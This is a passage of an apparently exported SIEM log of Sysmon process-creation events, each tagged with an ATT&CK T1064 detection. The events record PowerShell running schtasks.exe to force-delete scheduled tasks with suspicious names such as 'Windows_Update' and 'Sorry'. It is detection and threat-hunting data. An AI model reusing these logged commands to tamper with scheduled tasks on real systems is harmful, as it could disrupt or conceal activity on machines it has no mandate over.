Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.043",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.551 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-0010b5c91900} +ProcessId: 7144 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Windows_Update /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Windows_Update /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.552927400Z"",""eventRecordID"":""2218"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.551\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-0010b5c91900}\r\nProcessId: 7144\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Windows_Update /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.551"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-0010b5c91900}"",""processId"":""7144"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Windows_Update /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.025",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.525 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001025c81900} +ProcessId: 3268 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Sorry /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Sorry /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.528331600Z"",""eventRecordID"":""2217"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.525\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001025c81900}\r\nProcessId: 3268\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Sorry /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.525"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001025c81900}"",""processId"":""3268"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Sorry /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.008",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.503 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001096c61900} +ProcessId: 424 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ngm /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ngm /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.505794900Z"",""eventRecordID"":""2216"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.503\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001096c61900}\r\nProcessId: 424\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ngm /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.503"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001096c61900}"",""processId"":""424"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ngm /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.994",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.481 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001007c51900} +ProcessId: 1820 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN gm /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN gm /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.484230300Z"",""eventRecordID"":""2215"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.481\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001007c51900}\r\nProcessId: 1820\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN gm /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.481"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001007c51900}"",""processId"":""1820"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN gm /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.978",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.458 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001077c31900} +ProcessId: 6152 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Update service for products"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for products\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.460459900Z"",""eventRecordID"":""2214"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.458\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001077c31900}\r\nProcessId: 6152\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for products\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.458"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-001077c31900}"",""processId"":""6152"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Update service for products\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.962",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.432 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-0010c8c11900} +ProcessId: 7080 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Products Reporter"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Products Reporter\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.439746900Z"",""eventRecordID"":""2213"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.432\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-0010c8c11900}\r\nProcessId: 7080\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Products Reporter\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.432"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-0010c8c11900}"",""processId"":""7080"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Products Reporter\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 